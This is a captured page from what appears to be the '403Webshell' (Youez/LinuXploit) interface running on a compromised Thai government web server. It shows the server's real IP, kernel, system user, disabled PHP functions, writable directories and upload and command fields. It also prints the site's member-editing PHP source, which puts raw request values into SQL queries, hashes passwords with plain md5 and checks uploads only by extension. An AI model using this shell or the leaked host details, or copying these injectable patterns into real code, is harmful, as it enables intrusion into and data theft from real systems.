403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.135.182.208
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/private_html/coremain/module/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/private_html/coremain/module/member/member_edit_output.php
<?php
import_request_variables('pG', 'p_');

$navig['manage_user']="จัดการระบบสมาชิก";
$navig['edit_user']="แก้ไขสมาชิกระบบ";
navigator($navig);
echo "<br>";
bar_header("จัดการข้อมูลเรียบร้อยแล้ว"); // Bar_Header
fieldset_top("ข้อมูลส่วน");
$id_user = $_SESSION[id_user_admin];
if($p_name!="")						 		{	     $name=trim($p_name); 				}
if($p_surname!="")							{	     $surname=trim($p_surname); 		}
if($p_tel!="")								{	     $tel=trim($p_tel); 				}
if($p_email!="")							{	     $email=trim($p_email); 			}
if($p_address!="")							{	     $address=trim($p_address); 		}
if($p_sex!="")								{	     $sex=trim($p_sex); 				}
if($p_change_pass!="")						{	     $change_pass=trim($p_change_pass); 		}
if($p_new_pass!="")							{	     $new_pass=trim($p_new_pass); 				}
if($p_new_pass2!="")						{	     $new_pass2=trim($p_new_pass); 				}
$picture=trim($_FILES['picture_file']['name']);
$fail_case = -1;

// get profile id


$profile_id = select_query_data("profile_id","cms_user_profile","id_user",$id_user);
$pic_name = select_query_data("picture","cms_user_profile","id_user",$id_user);


$piccheck=0;

$sql = "update cms_user_profile SET name='$name', surname='$surname', telephone='$tel', email='$email', address='$address' ,sex='$sex' WHERE profile_id = $profile_id";
query($sql);

if ($new_pass !="" and $new_pass2!=""){
	$new_pass = md5($new_pass);
	$sql = "UPDATE cms_main_user SET pass = '$new_pass' WHERE id_user = $_SESSION[id_user_admin]";
	mysql_query ($sql);
}
	


// picture upload
if($picture!=""){

$pic_check = 1;
while($fail_case != 0)
{

		$strings1=substr($picture,-4);
			if($strings1!=".gif" and $strings1!=".jpg" and $strings1!=".GIF" and $strings1!=".JPG"){
				$fail_case = 1;	
				break;
		}
	
		$name1=$picture;
		
					$dlink=$_SESSION['web_name']."/users/$_SESSION[id_user_admin]/user_picture/".$pic_name;
					 $new_pic = $_SESSION['web_name']."/users/$_SESSION[id_user_admin]/user_picture/".$picture;
					$temp_name=$_FILES['picture_file']['tmp_name'];
					if (is_uploaded_file($_FILES['picture_file']['tmp_name'])) {
						if($pic_name!="")
						{
							if (file_exists($dlink))
								unlink ($dlink); // delete old file
						}
						if(!move_uploaded_file($temp_name,$new_pic)){
							$fail_case = 2;
							break;
						}
					}				
	$fail_case = 0;
	break;
 }
}
	if($fail_case==0 or $pic_check == 0)
	{
		if($fail_case == 0)
		{
			 $sql_new_pic = "UPDATE cms_user_profile SET picture = '$picture' WHERE profile_id = $profile_id";
			mysql_query ($sql_new_pic);
		}
		

		echo "<center><br><br>ข้อมูลได้ถูกแก้ไขแล้ว<br><br></center>"; 
		echo "<meta http-equiv='refresh' content='2; url=index.php?mod=member&path=member'>" ;
	}else{
		if($fail_case==1)
			echo "<center><br><br>ชนิดของรูปต้องเป็น GIF หรือ JPEG เท่านั้น<br><br></center>"; 
		else if ($fail_case==2)
			echo "<center><br><br>ไม่สามารถ Upload ไฟล์ได้ กรุณาติดต่อผู้ดูแลระบบ เพื่อเปิดการเขียนไฟล์<br><br></center>"; 
		else if ($fail_case==3)
			echo "<center><br><br>รูปสูงเกินกว่าขนาดที่กำหนด<br><br></center>"; 
		else if ($fail_case==4)
			echo "<center><br><br>รูปยาวกว่าขนาดที่กำหนด<br><br></center>"; 
		else 
			echo "<center><br><br>เกิดข้อผิดพลาด<br><br></center>"; 
		// refresh	
		echo "<meta http-equiv='refresh' content='2; url=index.php?mod=member&path=member'>" ;
	
	}

fieldset_down();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit